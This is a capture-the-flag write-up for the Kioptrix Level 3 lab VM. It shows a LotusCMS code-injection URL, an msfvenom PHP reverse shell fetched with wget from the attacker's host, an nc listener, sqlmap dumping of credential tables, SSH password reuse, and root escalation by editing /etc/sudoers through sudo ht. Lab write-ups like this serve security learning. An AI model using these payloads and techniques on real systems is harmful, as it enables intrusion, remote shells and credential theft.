Kioptrix: Level 3

This is my writeup for the Kioptrix Level 3 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

When scanning the host with nmap we find two open ports

  • 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 12:06 EDT
Nmap scan report for 192.168.254.168
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:F1:E7:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

Accessing the host at port 80 we get a web app:

web_app

LotusCMS

When inspecting the source code, we can find LotusCMS in the meta-tag keywords.

searchsploit_lotuscms

There seems to be a Remote Command Execution vulnerability in this CMS.

http://__IP__/index.php?page=index');phpinfo();//

LotusCMS_rce-1

Gallarific

If we try to access the gallery link this page is not rendered correctly. This is beacause assets can't be loaded due to the fixed base href. If one read the description, there is a hint.

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

source_code_base

So let's create a hosts-entry:

$ echo "__IP__ kioptrix3.com" >> /etc/hosts

When looking at the meta-tag generator we can see Gallarific. What seems to be a gallery web app.

Let's check searchsploit if the exist any known vulnerabilities.

searchsploit

Exploitation

LotusCMS

We try to get a shell using the Remote Command Execution:

Create a shell:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=__IP__ LPORT=__PORT__ -f raw > shell.php

Upload the shell:
kioptrix3.com/index.php?page=index');shell_exec('wget http://__IP__/php_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php');//

Start listener:
$ nc -nvlp 42

Kick the shell:
http://kioptrix3.com/index.php?page=index%27);include("/tmp/shell.php");//

php_rev_shell2

Gallarific

Let's try the SQL injection from the searchsploit list.
To exploit an SQL injection, we use sqlmap:
TODO: It came to my attention, that sqlmap is forbidden as well. Do this manually.

$ sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --random-agent --level 5 --risk 3 -D gallery --dump

Table: gallarific_users

username password
admin n0t7t1k4

Table: dev_accounts

username hash password
dreg 0d3eccfb887aabd50f243b3f155c0f85 Mast3r
loneferret 5badcaf789d3d1d09794d8f021f40f0e starwars

SSH

A common mistake people make is reuse passwords. In this case loneferret uses the same password for Gallarific and SSH. This allows us to log in to the box.

ssh loneferret@1__IP__

Privilege escalation

We're on the box but with limited access. Next step is to escalate our privileges.
CompanyPolicy.README which is located in loneferret's home directory looks interesting.

policy

The CEO orders users to use sudo ht to view, edit or create files.
What is HT Editor?

This program is a file viewer, editor and analyzer for text, binary, and (especially) executable files.

Setuid

setuid and setgid (short for "set user ID upon execution" and "set group ID upon execution", respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group respectively and to change behaviour in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.

setuid and setgid are needed for tasks that require higher privileges than those which common users have, such as changing their login password.
https://en.wikipedia.org/wiki/Setuid

ht-2
In this case that means we can view, edit or create any file as root.

Let's try to edit /etc/sudoers.

$ sudo ht -t /etc/sudoers
If we can remove the exclamation mark and change the path to /bin/su, we would be able to run /bin/su which would make us root.

$ sudo ht -t /etc/sudoers (-t for text editor mode)
Edit the file and press ctrl+w

sudoers

Let's try to run su:

root

And finally read the flag:

congrats